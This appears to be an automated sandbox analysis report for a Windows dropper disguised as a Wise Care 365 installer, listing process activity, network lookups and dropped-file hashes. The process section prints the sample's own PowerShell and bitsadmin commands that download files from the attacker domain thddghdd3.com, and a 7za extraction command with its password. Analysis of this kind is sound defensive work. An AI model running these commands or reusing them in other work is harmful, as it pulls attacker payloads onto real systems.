Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3848 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
PID 3848 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
PID 3848 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp
PID 3572 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 3572 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 748 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 748 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 748 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2600 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2600 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2600 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2600 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2600 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2600 wrote to memory of 4500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
PID 3572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
PID 3572 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe
PID 888 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
PID 888 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp
PID 888 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp" /SL5="$80092,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$802D0,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 thddghdd3.com udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

memory/3848-0-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/3848-2-0x0000000000401000-0x00000000004A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

memory/3572-6-0x0000000000400000-0x000000000067B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

memory/2380-25-0x00000000033B0000-0x00000000033E6000-memory.dmp

memory/2380-26-0x0000000005B90000-0x00000000061B8000-memory.dmp

memory/2380-27-0x00000000059B0000-0x00000000059D2000-memory.dmp

memory/2380-28-0x00000000062C0000-0x0000000006326000-memory.dmp

memory/2380-29-0x0000000006330000-0x0000000006396000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1jgcp3q.1wi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2380-39-0x00000000064C0000-0x0000000006814000-memory.dmp

memory/2380-40-0x0000000006960000-0x000000000697E000-memory.dmp

memory/2380-41-0x0000000006980000-0x00000000069CC000-memory.dmp

memory/2380-42-0x0000000007F90000-0x000000000860A000-memory.dmp

memory/2380-43-0x0000000006E70000-0x0000000006E8A000-memory.dmp

C:\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/888-51-0x0000000000400000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

memory/4256-67-0x00000000025B0000-0x00000000025C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

C:\Users\Admin\AppData\Local\Temp\is-ABTGS.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/4256-73-0x00000000074A0000-0x00000000077BA000-memory.dmp

memory/4256-77-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-79-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-80-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-90-0x0000000007960000-0x0000000007961000-memory.dmp

memory/4256-98-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-101-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-100-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-99-0x0000000007990000-0x0000000007991000-memory.dmp

memory/4256-97-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-96-0x0000000007980000-0x0000000007981000-memory.dmp

memory/4256-95-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-94-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-93-0x0000000007970000-0x0000000007971000-memory.dmp

memory/4256-92-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-91-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-89-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-88-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-87-0x0000000007950000-0x0000000007951000-memory.dmp

memory/4256-86-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-85-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-84-0x0000000007940000-0x0000000007941000-memory.dmp

memory/4256-83-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-82-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-81-0x0000000007930000-0x0000000007931000-memory.dmp

memory/4256-78-0x0000000007920000-0x0000000007921000-memory.dmp

memory/4256-75-0x0000000007910000-0x0000000007911000-memory.dmp

memory/4256-76-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-103-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-130-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-102-0x00000000079A0000-0x00000000079A1000-memory.dmp

memory/4256-132-0x0000000007A40000-0x0000000007A41000-memory.dmp

memory/4256-131-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-129-0x0000000007A30000-0x0000000007A31000-memory.dmp

memory/4256-128-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-127-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-126-0x0000000007A20000-0x0000000007A21000-memory.dmp

memory/4256-125-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-124-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-123-0x0000000007A10000-0x0000000007A11000-memory.dmp

memory/4256-122-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-121-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-120-0x0000000007A00000-0x0000000007A01000-memory.dmp

memory/4256-119-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-118-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-117-0x00000000079F0000-0x00000000079F1000-memory.dmp

memory/4256-116-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-115-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-114-0x00000000079E0000-0x00000000079E1000-memory.dmp

memory/4256-113-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-112-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-111-0x00000000079D0000-0x00000000079D1000-memory.dmp

memory/4256-110-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-109-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-108-0x00000000079C0000-0x00000000079C1000-memory.dmp

memory/4256-107-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-106-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/4256-105-0x00000000079B0000-0x00000000079B1000-memory.dmp

memory/4256-104-0x00000000077C0000-0x0000000007900000-memory.dmp

memory/3572-147-0x0000000000400000-0x000000000067B000-memory.dmp